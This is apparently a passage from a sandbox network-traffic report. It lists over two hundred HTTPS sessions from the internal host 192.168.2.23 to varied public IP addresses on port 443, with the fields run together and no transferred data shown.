                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9697192.168.2.2357750111.67.36.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9698192.168.2.2353440223.110.249.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9699192.168.2.2346502132.156.100.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9700192.168.2.234389499.49.200.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9701192.168.2.2357256131.104.70.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9702192.168.2.234098820.12.214.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9703192.168.2.235686866.30.208.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9704192.168.2.233343224.196.214.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9705192.168.2.235609440.65.154.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9706192.168.2.2345284176.205.179.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9707192.168.2.2357814187.124.179.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9708192.168.2.2344764114.255.80.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9709192.168.2.235637625.61.117.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9710192.168.2.235058281.208.77.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9711192.168.2.2349792118.171.66.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9712192.168.2.2350512207.102.159.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9713192.168.2.2334728153.245.88.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9714192.168.2.2357534117.82.76.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9715192.168.2.233553635.40.130.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9716192.168.2.2348094105.197.112.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9717192.168.2.235467053.142.221.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9718192.168.2.234437257.67.142.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9719192.168.2.2348120194.149.74.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9720192.168.2.2336964184.150.124.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9721192.168.2.2348756176.25.35.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9722192.168.2.2349426120.194.87.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9723192.168.2.233906018.117.185.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9724192.168.2.235248899.170.43.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9725192.168.2.234672883.36.190.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9726192.168.2.2335274164.198.218.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9727192.168.2.234740093.15.143.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9728192.168.2.23375524.226.132.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9729192.168.2.2333788212.112.164.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9730192.168.2.2359880157.95.41.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9731192.168.2.235779820.2.4.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9732192.168.2.2355796179.1.12.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9733192.168.2.234298089.113.198.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9734192.168.2.234858040.5.248.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9735192.168.2.2358432135.40.109.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9736192.168.2.233660225.6.242.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9737192.168.2.2335508205.200.32.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9738192.168.2.2336540217.203.199.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9739192.168.2.2349916163.102.73.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9740192.168.2.2341210218.231.110.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9741192.168.2.2353680146.80.132.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9742192.168.2.235525413.237.133.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9743192.168.2.2358572112.79.141.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9744192.168.2.2349822195.48.147.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9745192.168.2.2341184217.120.0.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9746192.168.2.2341802155.136.99.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9747192.168.2.2353436191.79.130.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9748192.168.2.235187280.21.245.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9749192.168.2.2340284103.30.174.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9750192.168.2.23414689.4.228.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9751192.168.2.2349280219.116.47.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9752192.168.2.233882431.248.36.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9753192.168.2.2346506146.113.4.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9754192.168.2.2358442157.107.113.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9755192.168.2.233596853.95.4.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9756192.168.2.234863653.82.47.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9757192.168.2.233409254.73.114.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9758192.168.2.235238687.190.124.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9759192.168.2.2337014118.111.228.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9760192.168.2.2356926177.217.114.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9761192.168.2.2358084194.94.243.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9762192.168.2.2360084117.40.230.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9763192.168.2.2336648197.115.67.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9764192.168.2.2343792108.245.187.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9765192.168.2.235656074.238.74.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9766192.168.2.2352670199.198.48.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9767192.168.2.235281078.166.197.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9768192.168.2.234062864.48.50.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9769192.168.2.2339814139.197.131.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9770192.168.2.2360632145.31.67.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9771192.168.2.235818637.176.163.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9772192.168.2.2344920134.3.111.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9773192.168.2.2356764113.189.92.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9774192.168.2.235718650.128.243.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9775192.168.2.2340640180.90.220.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9776192.168.2.235280266.0.44.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9777192.168.2.2358010107.103.118.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9778192.168.2.235475842.22.95.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9779192.168.2.23516525.230.156.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9780192.168.2.2339024119.223.165.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9781192.168.2.23526708.173.136.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9782192.168.2.2336678219.136.188.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9783192.168.2.236037881.68.30.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9784192.168.2.233641062.179.73.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9785192.168.2.2339256200.149.12.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9786192.168.2.2337420172.73.204.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9787192.168.2.2360670188.22.63.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9788192.168.2.2333652102.23.139.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9789192.168.2.2343158113.250.138.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9790192.168.2.233466246.229.150.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9791192.168.2.233796467.193.197.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9792192.168.2.2352254122.89.84.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9793192.168.2.2348424158.30.205.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9794192.168.2.2350146122.6.245.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9795192.168.2.236057067.214.73.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9796192.168.2.234535432.108.255.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9797192.168.2.2339720165.112.58.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9798192.168.2.2348762130.186.46.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9799192.168.2.2346670102.80.214.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9800192.168.2.234292469.206.105.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9801192.168.2.2341790105.11.243.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9802192.168.2.2358532218.18.182.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9803192.168.2.2359666143.168.159.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9804192.168.2.2333040204.13.48.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9805192.168.2.2336094153.198.103.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9806192.168.2.233363639.76.91.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9807192.168.2.2344434171.204.12.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9808192.168.2.235825447.108.66.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9809192.168.2.2333008156.211.11.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9810192.168.2.2353676210.115.27.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9811192.168.2.233732854.142.191.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9812192.168.2.2357874140.175.82.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9813192.168.2.2333080114.254.91.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9814192.168.2.2335190189.63.229.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9815192.168.2.235641031.61.165.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9816192.168.2.235107461.205.223.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9817192.168.2.2349204194.112.22.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9818192.168.2.2348576219.103.77.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9819192.168.2.2336082121.147.182.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9820192.168.2.2336420163.34.155.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9821192.168.2.2353338120.12.108.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9822192.168.2.235017849.68.158.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9823192.168.2.2347084121.50.33.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9824192.168.2.2340864141.26.133.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9825192.168.2.2353346151.143.166.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9826192.168.2.235679032.93.45.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9827192.168.2.234702841.44.30.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9828192.168.2.236044083.33.252.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9829192.168.2.2333514221.155.195.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9830192.168.2.2349750122.215.23.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9831192.168.2.235909860.108.159.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9832192.168.2.233587037.10.109.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9833192.168.2.2332810139.15.159.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9834192.168.2.233300636.216.199.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9835192.168.2.233450299.143.114.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9836192.168.2.233894299.142.198.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9837192.168.2.235965676.193.122.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9838192.168.2.235518627.10.247.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9839192.168.2.2345956187.249.15.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9840192.168.2.2340348202.248.254.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9841192.168.2.2335166181.220.167.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9842192.168.2.2333114103.214.16.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9843192.168.2.2355420208.167.74.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9844192.168.2.234234037.135.230.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9845192.168.2.2349188198.28.42.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9846192.168.2.234081232.155.215.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9847192.168.2.2335766167.92.15.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9848192.168.2.234437438.58.106.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9849192.168.2.234462087.44.224.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9850192.168.2.233535087.254.52.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9851192.168.2.233437672.237.195.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9852192.168.2.2356378130.139.228.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9853192.168.2.2346982144.181.38.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9854192.168.2.2339128139.16.148.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9855192.168.2.2338448220.174.75.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9856192.168.2.2347056169.84.87.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9857192.168.2.234655064.12.172.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9858192.168.2.2357308142.255.202.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9859192.168.2.233987261.205.97.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9860192.168.2.234125242.71.219.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9861192.168.2.2337168102.237.120.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9862192.168.2.2357434134.13.99.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9863192.168.2.23468509.55.212.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9864192.168.2.2345324126.28.183.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9865192.168.2.2350062133.216.81.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9866192.168.2.2337530199.96.156.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9867192.168.2.23540722.145.142.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9868192.168.2.2342444159.124.128.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9869192.168.2.2356798104.195.234.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9870192.168.2.23566682.6.243.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9871192.168.2.2340322125.73.145.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9872192.168.2.2335572156.244.177.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9873192.168.2.2354912210.89.9.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9874192.168.2.235712053.170.92.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9875192.168.2.233837414.42.167.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9876192.168.2.2358356219.244.8.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9877192.168.2.235765647.200.35.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9878192.168.2.2340484130.49.236.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9879192.168.2.234571074.38.59.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9880192.168.2.2356764180.58.54.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9881192.168.2.2339502149.170.40.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9882192.168.2.2343574223.62.123.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9883192.168.2.2352210174.65.113.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9884192.168.2.2345846197.161.43.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9885192.168.2.236083613.82.160.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9886192.168.2.2355258191.51.9.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9887192.168.2.2344950185.41.119.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9888192.168.2.2360788213.153.79.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9889192.168.2.235643660.50.59.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9890192.168.2.2353748115.33.82.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9891192.168.2.2341964132.171.129.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9892192.168.2.233995486.187.220.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9893192.168.2.2336744153.217.90.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9894192.168.2.235833484.136.253.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9895192.168.2.2353622119.63.146.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9896192.168.2.236035276.196.5.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9897192.168.2.235571268.200.63.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9898192.168.2.235650461.49.237.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9899192.168.2.2356664210.113.193.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9900192.168.2.234624246.215.107.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9901192.168.2.235977852.168.15.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9902192.168.2.2357370149.19.160.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9903192.168.2.234922632.254.145.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9904192.168.2.233601658.71.126.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9905192.168.2.2357038105.197.153.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9906192.168.2.2347186114.219.61.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9907192.168.2.233575239.2.37.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9908192.168.2.233757436.93.190.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9909192.168.2.2339772151.27.209.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9910192.168.2.234051698.82.125.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9911192.168.2.2335196116.89.117.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9912192.168.2.234846278.71.210.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9913192.168.2.234653044.217.110.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9914192.168.2.2338734139.201.108.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9915192.168.2.2356786203.4.206.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9916192.168.2.234531654.162.139.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9917192.168.2.2347276142.229.149.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9918192.168.2.233567234.216.230.68443
